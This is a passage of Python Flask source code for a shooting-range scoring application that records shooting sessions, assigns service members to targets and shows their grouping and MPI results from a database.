form.session_no.data=edit.session_no
form.date.data=edit.date
form.occ.data=edit.occasion
ammunation_name=Ammunation.query.filter(Ammunation.id==edit.ammunation_id).scalar()
form.ammunation_name.data=ammunation_name.name
firerarms_name=Firearms.query.filter(Firearms.id==edit.firearms_id).scalar()
form.firerarms_name.data=firerarms_name.name
range_name=Range.query.filter(Range.id==edit.shooting_range_id).scalar()
form.range_name.data=range_name.name
form.weather_notes.data=edit.weather_notes
form.comments.data=edit.comments
return render_template('pages/shooting_configuration_edit.html',form=form,edit=edit)
@app.route('/detail_dashboard/')
def detail_dashboard():
tshoot=db.session.query(TShooting).scalar()
if(tshoot is None):
T1_name = "NA"
T1_service="NA"
T1_rank ="NA"
T2_name = "NA"
T2_service="NA"
T2_rank ="NA"
T3_name = "NA"
T3_service="NA"
T3_rank ="NA"
T4_name = "NA"
T4_service="NA"
T4_rank ="NA"
T5_name = "NA"
T5_service="NA"
T5_rank ="NA"
T6_name = "NA"
T6_service="NA"
T6_rank ="NA"
T7_name = "NA"
T7_service="NA"
T7_rank ="NA"
T8_name = "NA"
T8_service="NA"
T8_rank ="NA"
else:
T1=Shooter.query.filter(Shooter.id==TShooting.target_1_id).scalar()
T1_name = T1.name
T1_service = T1.service_id
T1_r_id = T1.rank_id
T1_rank_id = Rank.query.filter(Rank.id==T1_r_id).scalar()
T1_rank=T1_rank_id.name
T2=Shooter.query.filter(Shooter.id==TShooting.target_2_id).scalar()
T2_name = T2.name
T2_service = T2.service_id
T2_r_id = T2.rank_id
T2_rank_id = Rank.query.filter(Rank.id==T2_r_id).scalar()
T2_rank=T2_rank_id.name
T3=Shooter.query.filter(Shooter.id==TShooting.target_3_id).scalar()
T3_name = T3.name
T3_service = T3.service_id
T3_r_id = T3.rank_id
T3_rank_id = Rank.query.filter(Rank.id==T3_r_id).scalar()
T3_rank=T3_rank_id.name
T4=Shooter.query.filter(Shooter.id==TShooting.target_4_id).scalar()
T4_name = T4.name
T4_service = T4.service_id
T4_r_id = T4.rank_id
T4_rank_id = Rank.query.filter(Rank.id==T4_r_id).scalar()
T4_rank=T4_rank_id.name
T5=Shooter.query.filter(Shooter.id==TShooting.target_5_id).scalar()
T5_name = T5.name
T5_service = T5.service_id
T5_r_id = T5.rank_id
T5_rank_id = Rank.query.filter(Rank.id==T5_r_id).scalar()
T5_rank=T5_rank_id.name
T6=Shooter.query.filter(Shooter.id==TShooting.target_6_id).scalar()
T6_name = T6.name
T6_service = T6.service_id
T6_r_id = T6.rank_id
T6_rank_id = Rank.query.filter(Rank.id==T6_r_id).scalar()
T6_rank=T6_rank_id.name
T7=Shooter.query.filter(Shooter.id==TShooting.target_7_id).scalar()
T7_name = T7.name
T7_service = T7.service_id
T7_r_id = T7.rank_id
T7_rank_id = Rank.query.filter(Rank.id==T7_r_id).scalar()
T7_rank=T7_rank_id.name
T8=Shooter.query.filter(Shooter.id==TShooting.target_8_id).scalar()
T8_name = T8.name
T8_service = T8.service_id
T8_r_id = T8.rank_id
T8_rank_id = Rank.query.filter(Rank.id==T8_r_id).scalar()
T8_rank=T8_rank_id.name
return render_template('pages/detail_dashboard.html' ,
T1_name=T1_name,
T1_service=T1_service,
T2_name=T2_name,
T2_service=T2_service,
T3_name=T3_name,
T3_service=T3_service,
T4_name=T4_name,
T4_service=T4_service,
T5_name=T5_name,
T5_service=T5_service,
T6_name=T6_name,
T6_service=T6_service,
T7_name=T7_name,
T7_service=T7_service,
T8_name=T8_name,
T8_service=T8_service,
T1_rank=T1_rank,
T2_rank=T2_rank,
T3_rank=T3_rank,
T4_rank=T4_rank,
T5_rank=T5_rank,
T6_rank=T6_rank,
T7_rank=T7_rank,
T8_rank=T8_rank
)
@app.route('/adhoc_detail_1/', methods=['GET', 'POST'])
def adhoc_detail_1():
name_1=None
army=None
rank=None
cant=None
set_1_name=None
set_1_army=None
set_2_name=None
set_2_army=None
set_3_name=None
set_3_army=None
set_4_name=None
set_4_army=None
res=[]
ten=[]
gp_len=[]
if request.method == "POST":
data1 = request.get_json()
army=data1['usr']
curdate=time.strftime("%Y-%m-%d")
name_1=db.session.query(Shooter.name).filter(Shooter.service_id==army).scalar()
target_1_id=db.session.query(Shooter.id).filter(Shooter.service_id==army).scalar()
rank_id=db.session.query(Shooter.rank_id).filter(Shooter.service_id==army).scalar()
cant_id=db.session.query(Shooter.cantonment_id).filter(Shooter.service_id==army).scalar()
rank=db.session.query(Rank.name).filter(Rank.id==rank_id).scalar()
cant=db.session.query(Cantonment.cantonment).filter(Cantonment.id==cant_id).scalar()
tten=db.session.query(MPI.tendency_code).filter(MPI.firer_id==target_1_id).order_by(MPI.datetimestamp.desc()).limit(5).all()[::-1]
tres = db.session.query(Grouping.result).filter(Grouping.firer_id==target_1_id).order_by(Grouping.datetimestamp.desc()).limit(5).all()[::-1]
tgp = db.session.query(Grouping.grouping_length_f).filter(Grouping.firer_id==target_1_id).order_by(Grouping.datetimestamp.desc()).limit(5).all()[::-1]
for ele in tres:
for ele2 in ele:
res.append(ele2)
for ele3 in tten:
for ele4 in ele3:
ten.append(ele4)
for ele5 in tgp:
for ele6 in ele5:
gp_len.append(ele6)
set_1_id = db.session.query(Firer_Details.firer_id).filter(Firer_Details.date==curdate,
Firer_Details.target_no==1,
Firer_Details.set_no==1
).distinct().scalar()
set_1_name=db.session.query(Shooter.name).filter(Shooter.id==set_1_id).scalar()
set_1_army=db.session.query(Shooter.service_id).filter(Shooter.id==set_1_id).scalar()
set_2_id = db.session.query(Firer_Details.firer_id).filter(Firer_Details.date==curdate,
Firer_Details.target_no==2,
Firer_Details.set_no==2
).distinct().scalar()
set_2_name=db.session.query(Shooter.name).filter(Shooter.id==set_2_id).scalar()
set_2_army=db.session.query(Shooter.service_id).filter(Shooter.id==set_2_id).scalar()
set_3_id = db.session.query(Firer_Details.firer_id).filter(Firer_Details.date==curdate,
Firer_Details.target_no==3,
Firer_Details.set_no==3
).distinct().scalar()
set_3_name=db.session.query(Shooter.name).filter(Shooter.id==set_3_id).scalar()
set_3_army=db.session.query(Shooter.service_id).filter(Shooter.id==set_3_id).scalar()
set_4_id = db.session.query(Firer_Details.firer_id).filter(Firer_Details.date==curdate,
Firer_Details.target_no==4,
Firer_Details.set_no==4
).distinct().scalar()
set_4_name=db.session.query(Shooter.name).filter(Shooter.id==set_4_id).scalar()
set_4_army=db.session.query(Shooter.service_id).filter(Shooter.id==set_4_id).scalar()
return jsonify(name_1=name_1,army=army,rank=rank,cant=cant,
set_1_name=set_1_name,
set_2_name=set_2_name,
set_3_name=set_3_name,
set_4_name=set_4_name,
set_1_army=set_1_army,
set_2_army=set_2_army,
set_3_army=set_3_army,
set_4_army=set_4_army,
gp_len=gp_len,
res=res,
ten=ten
)
@app.route('/individual_score/target_1', methods=['GET', 'POST'])
def individual_score_target_1():
session.clear()
data=TShooting.query.scalar()
firing_set_arr=[]
cantonment=Cantonment.query.distinct(Cantonment.cantonment)
curdate=time.strftime("%Y-%m-%d")
selection=Shooting_Session.query.filter(Shooting_Session.date>=curdate).order_by(Shooting_Session.datetimestamp.desc()).all()
gender =Gender.query.all()
rank_s = Rank.query.all()
firing_set=db.session.query(Firer_Details.set_no).filter(Firer_Details.target_no==1).distinct().all()
for ele in firing_set:
for ele2 in ele:
firing_set_arr.append(ele2)
if(len(firing_set_arr)<1):
pass
else:
i=len(firing_set_arr)-1
if(firing_set_arr[i]==5):
db.session.query(Firer_Details).filter(Firer_Details.target_no==1).delete()
db.session.commit()
else:
pass
dt=time.strftime("%Y-%m-%d")
curdatetime=datetime.now()
firer_1 = [row.service_id for row in Shooter.query.all()]
detail_data=db.session.query(Session_Detail).filter(Session_Detail.date==dt,Session_Detail.save_flag==0).all()
name = "NA"
detail_no ="NA"
rank ="NA"
target_no = 1
service_id ="NA"
ten = []
res = []
selection=Shooting_Session.query.filter(Shooting_Session.date>=dt).order_by(Shooting_Session.datetimestamp.desc()).all()
firearms = Firearms.query.all()
rang= Range.query.all()
ammunation = Ammunation.query.all()
return render_template('pages/prediction_target_1.html',
curdatetime=curdatetime,
name = name,
firer_1=firer_1,
rank=rank,
detail_data=detail_data,
detail_no=detail_no,
target_no=target_no,
service_id=service_id,
firearms=firearms,
ammunation=ammunation,
data=selection,
rang=rang,
res=res,
date=dt,
ten=ten,
cantonment=cantonment,
gender=gender,
rank_s=rank_s)
@app.route('/session_target_1/', methods=['GET', 'POST'])
def session_target_1():
if request.method == "POST":
data1 = request.get_json()
session=data1["session"]
ran=data1["range"]
arms=data1["arms"]
distance=data1["dis"]
occ=data1["occ"]
ammu=data1["ammu"]
weather=data1["weather"]
comment=data1["comment"]
range_id=db.session.query(Range.id).filter(Range.name==ran).scalar()
arms_id=db.session.query(Firearms.id).filter(Firearms.name==arms).scalar()
ammu_id=db.session.query(Ammunation.id).filter(Ammunation.name==ammu).scalar()
shooting=Shooting_Session(
date=time.strftime("%Y-%m-%d"),
datetimestamp=time.strftime("%Y-%m-%d %H:%M"),
shooting_range_id=range_id,
firearms_id=arms_id,
ammunation_id=ammu_id,
target_distance=distance,
weather_notes =weather,
comments =comment,
session_no=session,
occasion=occ
)
db.session.add(shooting)
db.session.commit()
result="This is Successfully Saved"
return jsonify(result=result ,session=session)
@app.route('/target_1_populate/', methods=['GET', 'POST'])
def target_1_populate():
if request.method == 'POST':
session_id=db.session.query(TShooting.session_id).scalar()
return jsonify(session_id=session_id)
@app.route('/load_detail_1/', methods=['GET', 'POST'])
def load_detail_1():
result_1="Done"
if request.method == 'POST':
curdate=time.strftime("%Y-%m-%d")
r8=None
data=request.get_json()
tmp_list = []
duplicate = False
detail =data["detail"]
sess=data["session"]
paper=data["paper"]
shot=data["shot"]
set=data["set"]
if(data["r1"]==""):
r1_id=999
else:
r1=data["r1"]
r1_id=db.session.query(Shooter.id).filter(Shooter.service_id==r1).scalar()
if(data["r2"]==""):
r2_id=999
else:
r2=data["r2"]
r2_id=db.session.query(Shooter.id).filter(Shooter.service_id==r2).scalar()
if(data["r3"]==""):
r3_id=999
else:
r3=data["r3"]
r3_id=db.session.query(Shooter.id).filter(Shooter.service_id==r3).scalar()
if(data["r4"]==""):
r4_id=999
else:
r4=data["r4"]
r4_id=db.session.query(Shooter.id).filter(Shooter.service_id==r4).scalar()
if(data["r5"]==""):
r5_id=999
else:
r5=data["r5"]
r5_id=db.session.query(Shooter.id).filter(Shooter.service_id==r5).scalar()
if(data["r6"]==""):
r6_id=999
else:
r6=data["r6"]
r6_id=db.session.query(Shooter.id).filter(Shooter.service_id==r6).scalar()
if(data["r7"]==""):
r7_id=999
else:
r7=data["r7"]
r7_id=db.session.query(Shooter.id).filter(Shooter.service_id==r7).scalar()
if(data["r8"]==""):
r8_id=999
else:
r8=data["r8"]
r8_id=db.session.query(Shooter.id).filter(Shooter.service_id==r8).scalar()
tmp_list.append(r1_id)
tmp_list.append(r2_id)
tmp_list.append(r3_id)
tmp_list.append(r4_id)
tmp_list.append(r5_id)
tmp_list.append(r6_id)
tmp_list.append(r7_id)
tmp_list.append(r8_id)
db.session.query(TPaper_ref).delete()
db.session.commit()
ref_db = TPaper_ref(
date=time.strftime("%Y-%m-%d"),
paper_ref=paper,
detail_no=detail,
session_no=sess
)
db.session.add(ref_db)
db.session.commit()
for i in range(len(tmp_list)):
for j in range(len(tmp_list)):
if(i!=j and tmp_list[i]==tmp_list[j]):
if(tmp_list[i]== 999 and tmp_list[j]==999):
duplicate = False
else:
duplicate = True
else:
duplicate = False
if(duplicate):
print("inside dup")
error="dup"
else:
db.session.query(TShooting).delete()
db.session.commit()
tshoot=TShooting(
date=datetime.now(),
datetimestamp=time.strftime("%Y-%m-%d %H:%M"),
session_id=sess,
detail_no=detail,
target_1_id=r1_id,
target_2_id=r2_id,
target_3_id=r3_id,
target_4_id=r4_id,
target_5_id=r5_id,
target_6_id=r6_id,
target_7_id=r7_id,
target_8_id=r8_id,
paper_ref=paper,
set_no=set,
save_flag=0
)
db.session.add(tshoot)
db.session.commit()
detail_shots =Session_Detail(
date=datetime.now(),
datetimestamp=time.strftime("%Y-%m-%d %H:%M"),
session_id=sess,
detail_no=detail,
target_1_id=r1_id,
target_2_id=r2_id,
target_3_id=r3_id,
target_4_id=r4_id,
target_5_id=r5_id,
target_6_id=r6_id,
target_7_id=r7_id,
target_8_id=r8_id,
paper_ref=paper,
set_no=set,
save_flag=0
)
db.session.add(detail_shots)
db.session.commit()
error="ok"
firer_name,cant,rank,service_id,res,tenden,gp_len,set_4_name,set_4_army,set_4_session_no,set_4_detail_no,set_3_name,set_3_army,set_3_session_no,set_3_detail_no,set_2_name,set_2_army,set_2_session_no,set_2_detail_no,set_1_name,set_1_army,set_1_session_no,set_1_detail_no,current_firer_name,current_army_no,current_session_no,current_detail_no=get_information(r1_id,sess,paper)
result="The Detail is Saved Successfully"
return jsonify(result=result,data1=firer_name,ra_1=rank,detail=detail,
service_id_1=service_id,
session=sess,
paper=paper,
set_no=set,
cant=cant,
gp_len=gp_len,
res=res,
ten=tenden,
set_4_name=set_4_name,
set_3_name=set_3_name,
set_2_name=set_2_name,
set_1_name=set_1_name,
current_firer_name=current_firer_name,
set_4_army=set_4_army,
set_3_army=set_3_army,
set_2_army=set_2_army,
set_1_army=set_1_army,
current_army_no=current_army_no,
set_4_session_no=set_4_session_no,
set_3_session_no=set_3_session_no,
set_2_session_no=set_2_session_no,
set_1_session_no=set_1_session_no,
current_session_no=current_session_no,
set_4_detail_no=set_4_detail_no,
set_3_detail_no=set_3_detail_no,
set_2_detail_no=set_2_detail_no,
set_1_detail_no=set_1_detail_no,
current_detail_no=current_detail_no
)
return jsonify(result_1=result_1)
def get_information(target_1_id,sess,paper_ref):
res=[]
ten=[]
gp_len=[]
curdate=time.strftime("%Y-%m-%d")
tten=db.session.query(MPI.tendency_code).filter(MPI.firer_id==target_1_id).order_by(MPI.datetimestamp.desc()).limit(5).all()[::-1]
tres = db.session.query(Grouping.result).filter(Grouping.firer_id==target_1_id).order_by(Grouping.datetimestamp.desc()).limit(5).all()[::-1]
tgp = db.session.query(Grouping.grouping_length_f).filter(Grouping.firer_id==target_1_id).order_by(Grouping.datetimestamp.desc()).limit(5).all()[::-1]
for ele in tres:
for ele2 in ele:
res.append(ele2)
for ele3 in tten:
for ele4 in ele3:
ten.append(ele4)
for ele5 in tgp:
for ele6 in ele5:
gp_len.append(int(ele6))
da_1=db.session.query(Shooter.name).filter(Shooter.id==target_1_id).scalar()
cant_id=db.session.query(Shooter.cantonment_id).filter(Shooter.id==target_1_id).scalar()
cant=db.session.query(Cantonment.cantonment).filter(Cantonment.id==cant_id).scalar()
ra_1_id=db.session.query(Shooter.rank_id).filter(Shooter.id==target_1_id).scalar()
ra_1 = db.session.query(Rank.name).filter(Rank.id==ra_1_id).scalar()
service_id_1 = db.session.query(Shooter.service_id).filter(Shooter.id==target_1_id).scalar()
set_1_id = db.session.query(Firer_Details.firer_id).filter(
Firer_Details.date==curdate,
Firer_Details.target_no==1,
Firer_Details.set_no==1
).distinct().scalar()
set_1_session_no=db.session.query(Firer_Details.session_id).filter(
Firer_Details.date==curdate,
Firer_Details.target_no==1,
Firer_Details.set_no==1
).distinct().scalar()
set_1_detail_no=db.session.query(Firer_Details.detail_id).filter(
Firer_Details.date==curdate,
Firer_Details.target_no==1,
Firer_Details.set_no==1
).distinct().scalar()
set_1_name=db.session.query(Shooter.name).filter(
Shooter.id==set_1_id
).scalar()
set_1_army=db.session.query(Shooter.service_id).filter(Shooter.id==set_1_id).scalar()
set_2_id = db.session.query(Firer_Details.firer_id).filter(
Firer_Details.date==curdate,
Firer_Details.target_no==1,
Firer_Details.set_no==2
).distinct().scalar()
set_2_session_no=db.session.query(Firer_Details.session_id).filter(
Firer_Details.date==curdate,
Firer_Details.target_no==1,
Firer_Details.set_no==2
).distinct().scalar()
set_2_detail_no=db.session.query(Firer_Details.detail_id).filter(
Firer_Details.date==curdate,
Firer_Details.target_no==1,
Firer_Details.set_no==2
).distinct().scalar()
set_2_name=db.session.query(Shooter.name).filter(
Shooter.id==set_2_id
).scalar()
set_2_army=db.session.query(Shooter.service_id).filter(Shooter.id==set_2_id).scalar()
set_3_id = db.session.query(Firer_Details.firer_id).filter(
Firer_Details.date==curdate,
Firer_Details.target_no==1,
Firer_Details.set_no==3
).distinct().scalar()
set_3_session_no=db.session.query(Firer_Details.session_id).filter(
Firer_Details.date==curdate,
Firer_Details.target_no==1,
Firer_Details.set_no==3
).distinct().scalar()
set_3_detail_no=db.session.query(Firer_Details.detail_id).filter(
Firer_Details.date==curdate,
Firer_Details.target_no==1,
Firer_Details.set_no==3
).distinct().scalar()
set_3_name=db.session.query(Shooter.name).filter(
Shooter.id==set_3_id
).scalar()
set_3_army=db.session.query(Shooter.service_id).filter(Shooter.id==set_3_id).scalar()
set_4_id = db.session.query(Firer_Details.firer_id).filter(
Firer_Details.date==curdate,
Firer_Details.target_no==1,
Firer_Details.set_no==4
).distinct().scalar()
set_4_session_no=db.session.query(Firer_Details.session_id).filter(
Firer_Details.date==curdate,
Firer_Details.target_no==1,
Firer_Details.set_no==4
).distinct().scalar()
set_4_detail_no=db.session.query(Firer_Details.detail_id).filter(
Firer_Details.date==curdate,
Firer_Details.target_no==1,
Firer_Details.set_no==4
).distinct().scalar()
set_4_name=db.session.query(Shooter.name).filter(
Shooter.id==set_4_id
).scalar()
set_4_army=db.session.query(Shooter.service_id).filter(Shooter.id==set_4_id).scalar()
current_firer_name = db.session.query(Shooter.name).filter(Shooter.id==target_1_id).scalar()
current_army_no = db.session.query(Shooter.service_id).filter(Shooter.id==target_1_id).scalar()
current_session_no=db.session.query(TShooting.session_id).filter(TShooting.target_1_id==target_1_id).scalar()
current_detail_no=db.session.query(TShooting.detail_no).filter(TShooting.target_1_id==target_1_id).scalar()
return(da_1,cant,ra_1,service_id_1,res,ten,gp_len,
set_4_name,set_4_army,set_4_session_no,set_4_detail_no,
set_3_name,set_3_army,set_3_session_no,set_3_detail_no,
set_2_name,set_2_army,set_2_session_no,set_2_detail_no,
set_1_name,set_1_army,set_1_session_no,set_1_detail_no,
current_firer_name,current_army_no,current_session_no,current_detail_no
)
@app.route('/individual_score/target_2', methods=['GET', 'POST'])
def individual_score_target_2():
firer_id =db.session.query(TShooting.target_2_id).scalar()
detail_no =db.session.query(TShooting.detail_no).scalar()
session_no =db.session.query(TShooting.session_id).scalar()
target_no = 2
tres = db.session.query(Grouping.result).filter(Grouping.firer_id==firer_id).order_by(Grouping.datetimestamp.desc()).limit(5).all()[::-1]
res=[]
ten=[]
tten=db.session.query(MPI.tendency_code).filter(MPI.firer_id==firer_id).order_by(MPI.datetimestamp.desc()).limit(5).all()[::-1]
print(tres,)
for ele in tres:
for ele2 in ele:
print(type(ele2))
res.append(ele2)
for ele3 in tten:
for ele4 in ele3:
print(type(ele4))
ten.append(ele4)
service_id = db.session.query(Shooter.service_id).filter(Shooter.id==firer_id).scalar()
rank_id=db.session.query(Shooter.rank_id).filter(Shooter.id==firer_id).scalar()
rank=db.session.query(Rank.name).filter(Rank.id==rank_id).scalar()
name = db.session.query(Shooter.name).filter(Shooter.id==firer_id).scalar()
firer_id,sess,o,p,u,q,t1_x,t1_y,xmpi,ympi,f,gp,Tfirt_x,Tfirt_y,fin_x_1,fin_y_1,result_1,fir_tendency_1=prediction_calculation_2()
if request.method == 'POST':
paper_ref=db.session.query(TPaper_ref.paper_ref).scalar()
print("paper_ref")
print(paper_ref)
return render_template('pages/prediction_target_2.html',
name = name,
detail_no=detail_no,
session_no=session_no,
target_no=target_no,
service_id=service_id,
rank=rank,
res=res,
ten=ten)
@app.route('/individual_score/target_3', methods=['GET', 'POST'])
def individual_score_target_3():
firer_id =db.session.query(TShooting.target_3_id).scalar()
detail_no =db.session.query(TShooting.detail_no).scalar()
session_no =db.session.query(TShooting.session_id).scalar()
target_no = 3
tres = db.session.query(Grouping.result).filter(Grouping.firer_id==firer_id).order_by(Grouping.datetimestamp.desc()).limit(5).all()[::-1]
res=[]
ten=[]
tten=db.session.query(MPI.tendency_code).filter(MPI.firer_id==firer_id).order_by(MPI.datetimestamp.desc()).limit(5).all()[::-1]
print(tres)
for ele in tres:
for ele2 in ele:
print(type(ele2))
res.append(ele2)
for ele3 in tten:
for ele4 in ele3:
print(type(ele4))
ten.append(ele4)
service_id = db.session.query(Shooter.service_id).filter(Shooter.id==firer_id).scalar()
rank_id=db.session.query(Shooter.rank_id).filter(Shooter.id==firer_id).scalar()
rank=db.session.query(Rank.name).filter(Rank.id==rank_id).scalar()
name = db.session.query(Shooter.name).filter(Shooter.id==firer_id).scalar()
return render_template('pages/prediction_target_3.html',
name = name,
detail_no=detail_no,
session_no=session_no,
target_no=target_no,
service_id=service_id,
rank=rank,
res=res,
ten=ten)
@app.route('/individual_score/target_4', methods=['GET', 'POST'])
def individual_score_target_4():
firer_id =db.session.query(TShooting.target_4_id).scalar()
detail_no =db.session.query(TShooting.detail_no).scalar()
session_no =db.session.query(TShooting.session_id).scalar()
target_no = 4
tres = db.session.query(Grouping.result).filter(Grouping.firer_id==firer_id).order_by(Grouping.datetimestamp.desc()).limit(5).all()[::-1]
res=[]
ten=[]
tten=db.session.query(MPI.tendency_code).filter(MPI.firer_id==firer_id).order_by(MPI.datetimestamp.desc()).limit(5).all()[::-1]
print(tres)
for ele in tres:
for ele2 in ele:
print(type(ele2))
res.append(ele2)
for ele3 in tten:
for ele4 in ele3:
print(type(ele4))
ten.append(ele4)
service_id = db.session.query(Shooter.service_id).filter(Shooter.id==firer_id).scalar()
rank_id=db.session.query(Shooter.rank_id).filter(Shooter.id==firer_id).scalar()
rank=db.session.query(Rank.name).filter(Rank.id==rank_id).scalar()
name = db.session.query(Shooter.name).filter(Shooter.id==firer_id).scalar()
return render_template('pages/prediction_target_4.html',
name = name,
detail_no=detail_no,
session_no=session_no,
target_no=target_no,
service_id=service_id,
rank=rank,
res=res,
ten=ten)
@app.route('/individual_score/target_5', methods=['GET', 'POST'])
def individual_score_target_5():
firer_id =db.session.query(TShooting.target_5_id).scalar()
detail_no =db.session.query(TShooting.detail_no).scalar()
session_no =db.session.query(TShooting.session_id).scalar()
target_no = 5
tres = db.session.query(Grouping.result).filter(Grouping.firer_id==firer_id).order_by(Grouping.datetimestamp.desc()).limit(5).all()[::-1]
res=[]
ten=[]
tten=db.session.query(MPI.tendency_code).filter(MPI.firer_id==firer_id).order_by(MPI.datetimestamp.desc()).limit(5).all()[::-1]
print(tres)
for ele in tres:
for ele2 in ele:
print(type(ele2))
res.append(ele2)
for ele3 in tten:
for ele4 in ele3:
print(type(ele4))
ten.append(ele4)
service_id = db.session.query(Shooter.service_id).filter(Shooter.id==firer_id).scalar()
rank_id=db.session.query(Shooter.rank_id).filter(Shooter.id==firer_id).scalar()
rank=db.session.query(Rank.name).filter(Rank.id==rank_id).scalar()
name = db.session.query(Shooter.name).filter(Shooter.id==firer_id).scalar()
return render_template('pages/prediction_target_5.html',
name = name,
detail_no=detail_no,
session_no=session_no,
target_no=target_no,
service_id=service_id,
rank=rank,
res=res,
ten=ten)
@app.route('/individual_score/target_6', methods=['GET', 'POST'])
def individual_score_target_6():
firer_id =db.session.query(TShooting.target_6_id).scalar()
detail_no =db.session.query(TShooting.detail_no).scalar()
session_no =db.session.query(TShooting.session_id).scalar()
target_no = 6
tres = db.session.query(Grouping.result).filter(Grouping.firer_id==firer_id).order_by(Grouping.datetimestamp.desc()).limit(5).all()[::-1]
res=[]
ten=[]
tten=db.session.query(MPI.tendency_code).filter(MPI.firer_id==firer_id).order_by(MPI.datetimestamp.desc()).limit(5).all()[::-1]
print(tres)
for ele in tres:
for ele2 in ele:
print(type(ele2))
res.append(ele2)
for ele3 in tten:
for ele4 in ele3:
print(type(ele4))
ten.append(ele4)
service_id = db.session.query(Shooter.service_id).filter(Shooter.id==firer_id).scalar()
rank_id=db.session.query(Shooter.rank_id).filter(Shooter.id==firer_id).scalar()
rank=db.session.query(Rank.name).filter(Rank.id==rank_id).scalar()
name = db.session.query(Shooter.name).filter(Shooter.id==firer_id).scalar()
return render_template('pages/prediction_target_6.html',
name = name,
detail_no=detail_no,
session_no=session_no,
target_no=target_no,
service_id=service_id,
rank=rank,
res=res,
ten=ten)
@app.route('/individual_score/target_7', methods=['GET', 'POST'])
def individual_score_target_7():
firer_id =db.session.query(TShooting.target_7_id).scalar()
detail_no =db.session.query(TShooting.detail_no).scalar()
session_no =db.session.query(TShooting.session_id).scalar()
target_no = 7
tres = db.session.query(Grouping.result).filter(Grouping.firer_id==firer_id).order_by(Grouping.datetimestamp.desc()).limit(5).all()[::-1]
res=[]
ten=[]
tten=db.session.query(MPI.tendency_code).filter(MPI.firer_id==firer_id).order_by(MPI.datetimestamp.desc()).limit(5).all()[::-1]
print(tres)
for ele in tres:
for ele2 in ele:
print(type(ele2))
res.append(ele2)
for ele3 in tten:
for ele4 in ele3:
print(type(ele4))
ten.append(ele4)
service_id = db.session.query(Shooter.service_id).filter(Shooter.id==firer_id).scalar()
rank_id=db.session.query(Shooter.rank_id).filter(Shooter.id==firer_id).scalar()
rank=db.session.query(Rank.name).filter(Rank.id==rank_id).scalar()
name = db.session.query(Shooter.name).filter(Shooter.id==firer_id).scalar()
return render_template('pages/prediction_target_7.html',
name = name,
detail_no=detail_no,
session_no=session_no,
target_no=target_no,
service_id=service_id,
rank=rank,
res=res,
ten=ten)
@app.route('/individual_score/target_8', methods=['GET', 'POST'])
def individual_score_target_8():
firer_id =db.session.query(TShooting.target_8_id).scalar()
detail_no =db.session.query(TShooting.detail_no).scalar()
session_no =db.session.query(TShooting.session_id).scalar()
target_no = 7
tres = db.session.query(Grouping.result).filter(Grouping.firer_id==firer_id).order_by(Grouping.datetimestamp.desc()).limit(5).all()[::-1]
res=[]
ten=[]
tten=db.session.query(MPI.tendency_code).filter(MPI.firer_id==firer_id).order_by(MPI.datetimestamp.desc()).limit(5).all()[::-1]
print(tres)
for ele in tres:
for ele2 in ele:
print(type(ele2))
res.append(ele2)
for ele3 in tten:
for ele4 in ele3:
print(type(ele4))
ten.append(ele4)
service_id = db.session.query(Shooter.service_id).filter(Shooter.id==firer_id).scalar()
rank_id=db.session.query(Shooter.rank_id).filter(Shooter.id==firer_id).scalar()
rank=db.session.query(Rank.name).filter(Rank.id==rank_id).scalar()
name = db.session.query(Shooter.name).filter(Shooter.id==firer_id).scalar()
return render_template('pages/prediction_target_8.html',
name = name,
detail_no=detail_no,
session_no=session_no,
target_no=target_no,
service_id=service_id,
rank=rank,
res=res,
ten=ten)
@app.route('/prediction_target_1/', methods=['GET', 'POST'])
def prediction_target_1():
t1_x=0
t1_y=0
xmpi_j=0
ympi_j=0
gp=0
Tfirt_x_j=0
Tfirt_y_j=0
fin_x_1=0
fin_y_1=0
xmpi_inch = 0
ympi_inch = 0
result_1=None
fir_tendency=None
set_1_name = None
set_1_army =None
set_1_session_no = None
set_1_detail_no=None
set_1_id =None
set_2_name = None
set_2_army =None
set_2_session_no = None
set_2_detail_no=None
set_2_id =None
set_3_name = None
set_3_army =None
set_3_session_no = None
set_3_detail_no=None
set_3_id =None
set_4_name = None
set_4_army =None
set_4_session_no = None
set_4_detail_no=None
set_4_id =None
fir_tendency_1=None
firer_id=None
current_army_no=None
current_firer_name=None
current_session_no=None
session_detail_no=None
current_detail_no=None
set_2_x=None
set_2_y=None
set_3_x=None
set_3_y=None
set_4_x=None
set_4_y=None
paper_ref=None
sess=None
res=None
set_2_x_arr=[]
set_2_y_arr=[]
set_3_x_arr=[]
set_3_y_arr=[]
set_4_x_arr=[]
set_4_y_arr=[]
fin_x_arr_1=[]
fin_y_arr_1=[]
curdate=time.strftime("%Y-%m-%d")
if request.method == 'POST':
firer_id,sess,detail,p,u,q,t1_x,t1_y,xmpi,ympi,f,gp,Tfirt_x,Tfirt_y,fin_x_1,fin_y_1,result_1,fir_tendency_1=prediction_calculation_1()
paper_ref=db.session.query(TPaper_ref.paper_ref).scalar()
set_2_x=db.session.query(Firer_Details).filter(Firer_Details.date==curdate , Firer_Details.target_no==1 ,Firer_Details.set_no==2 , Firer_Details.session_id==sess).all()
set_2_y=db.session.query(Firer_Details).filter(Firer_Details.date==curdate , Firer_Details.target_no==1 , Firer_Details.set_no==2 , Firer_Details.session_id==sess).all()
for x_2 in set_2_x:
set_2_x_arr.append(int(x_2.final_x))
for y_2 in set_2_y:
set_2_y_arr.append(int(y_2.final_y))
set_3_x=db.session.query(Firer_Details).filter(Firer_Details.date==curdate , Firer_Details.target_no==1 , Firer_Details.set_no==3 , Firer_Details.session_id==sess).all()
set_3_y=db.session.query(Firer_Details).filter(Firer_Details.date==curdate , Firer_Details.target_no==1 , Firer_Details.set_no==3 , Firer_Details.session_id==sess).all()
for x_3 in set_3_x:
set_3_x_arr.append(int(x_3.final_x))
for y_3 in set_3_y:
set_3_y_arr.append(int(y_3.final_y))
print(set_3_x_arr)
set_4_x=db.session.query(Firer_Details).filter(Firer_Details.date==curdate , Firer_Details.target_no==1 , Firer_Details.set_no==4 , Firer_Details.session_id==sess).all()
set_4_y=db.session.query(Firer_Details).filter(Firer_Details.date==curdate , Firer_Details.target_no==1 , Firer_Details.set_no==4 , Firer_Details.session_id==sess).all()
for x_4 in set_4_x:
set_4_x_arr.append(int(x_4.final_x))
for y_4 in set_4_y:
set_4_y_arr.append(int(y_4.final_y))
set_1_id = db.session.query(Firer_Details.firer_id).filter(
Firer_Details.date==curdate,
Firer_Details.target_no==1,
Firer_Details.set_no==1
).distinct().scalar()
set_1_session_no=db.session.query(Firer_Details.session_id).filter(
Firer_Details.date==curdate,
Firer_Details.target_no==1,
Firer_Details.set_no==1
).distinct().scalar()
set_1_detail_no=db.session.query(Firer_Details.detail_id).filter(
Firer_Details.date==curdate,
